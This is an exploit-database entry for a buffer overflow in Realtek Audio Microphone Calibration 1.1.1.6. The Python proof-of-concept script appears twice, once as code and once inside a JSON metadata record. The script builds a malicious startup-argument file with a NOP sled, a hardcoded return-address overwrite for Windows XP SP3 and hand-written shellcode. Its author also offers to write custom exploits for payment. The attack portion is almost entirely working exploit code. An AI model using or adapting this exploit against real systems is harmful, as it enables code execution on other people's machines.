Search...

Realtek Audio Microphone Calibration 1.1.1.6 Exploit

2014-07-01T00:00:00

ID SSV:70223
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                # done by BraniX &#60;branix@hackers.org.pl&#62;
# www.hackers.org.pl
# found: 2010.08.24
# tested on: Windows XP SP3 Home Edition

# App. has classic buffer overflow vulnerability
# it can be triggered by passing too long argument 
# as a startup parameter. Shellcode can by run via classic
# ret overwrite or SEH Handler overwrite ... so it&#39;s a mini-combo ;)

# Ps. If you need generic exploit ...
# (no hardcoded VA&#39;a), write it yourself ;) or &#39;donate few&#39; $$$ 
# we will c0de it for You ^^

filepath = &#34;C:\\ShellCode\\MicCal 1.1.1.6 - Exploit.bin&#34;
f = open(filepath, &#34;wb&#34;)

# dummy data
f.write(&#39;\x90&#39; * 340)

# overwrite ret
f.write(&#39;\xD7\x30\x9D\x7C&#39;)
f.write(&#34;[BraniX]&#34;)
f.write(&#39;A&#39; * 8)

# start shellcode
f.write(&#39;\x83\xEC\x08&#39;)         # sub esp,8
f.write(&#39;\x88\x04\x24&#39;)         # mov byte ptr [esp], al
f.write(&#39;\x83\xEC\x08&#39;)         # sub esp,8

f.write(&#39;\x54&#39;)                 # push esp
f.write(&#39;\x5B&#39;)                 # pop ebx

f.write(&#39;\x50&#39;)                 # push eax
f.write(&#39;\x53&#39;)                 # push ebx
f.write(&#39;\x53&#39;)                 # push ebx
f.write(&#39;\x50&#39;)                 # push eax

f.write(&#39;\xE8\x35\x08\x27\x7E&#39;) # call user32.MessageBoxA
f.write(&#39;\x57&#39;)                 # push edi

f.write(&#39;\xE8\x57\xCB\x6E\x7C&#39;) # call kernel32.ExitProcess

f.write(&#39;\xCC&#39; * 10)            # int 3&#39;s

f.close()

print &#34;Done ...&#34;

JSON Vulners Source

Initial Source

{"lastseen": "2017-11-19T17:04:07", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "poc", "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "href": "https://www.seebug.org/vuldb/ssvid-70223", "references": [], "enchantments_done": [], "id": "SSV:70223", "title": "Realtek Audio Microphone Calibration 1.1.1.6 Exploit", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 3, "sourceData": "\n # done by BraniX <branix@hackers.org.pl>\r\n# www.hackers.org.pl\r\n# found: 2010.08.24\r\n# tested on: Windows XP SP3 Home Edition\r\n\r\n# App. has classic buffer overflow vulnerability\r\n# it can be triggered by passing too long argument \r\n# as a startup parameter. Shellcode can by run via classic\r\n# ret overwrite or SEH Handler overwrite ... so it's a mini-combo ;)\r\n\r\n# Ps. If you need generic exploit ...\r\n# (no hardcoded VA'a), write it yourself ;) or 'donate few' $$$ \r\n# we will c0de it for You ^^\r\n\r\nfilepath = "C:\\\\ShellCode\\\\MicCal 1.1.1.6 - Exploit.bin"\r\nf = open(filepath, "wb")\r\n\r\n# dummy data\r\nf.write('\\x90' * 340)\r\n\r\n# overwrite ret\r\nf.write('\\xD7\\x30\\x9D\\x7C')\r\nf.write("[BraniX]")\r\nf.write('A' * 8)\r\n\r\n# start shellcode\r\nf.write('\\x83\\xEC\\x08') # sub esp,8\r\nf.write('\\x88\\x04\\x24') # mov byte ptr [esp], al\r\nf.write('\\x83\\xEC\\x08') # sub esp,8\r\n\r\nf.write('\\x54') # push esp\r\nf.write('\\x5B') # pop ebx\r\n\r\nf.write('\\x50') # push eax\r\nf.write('\\x53') # push ebx\r\nf.write('\\x53') # push ebx\r\nf.write('\\x50') # push eax\r\n\r\nf.write('\\xE8\\x35\\x08\\x27\\x7E') # call user32.MessageBoxA\r\nf.write('\\x57') # push edi\r\n\r\nf.write('\\xE8\\x57\\xCB\\x6E\\x7C') # call kernel32.ExitProcess\r\n\r\nf.write('\\xCC' * 10) # int 3's\r\n\r\nf.close()\r\n\r\nprint "Done ..."\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-70223", "type": "seebug", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645364449}}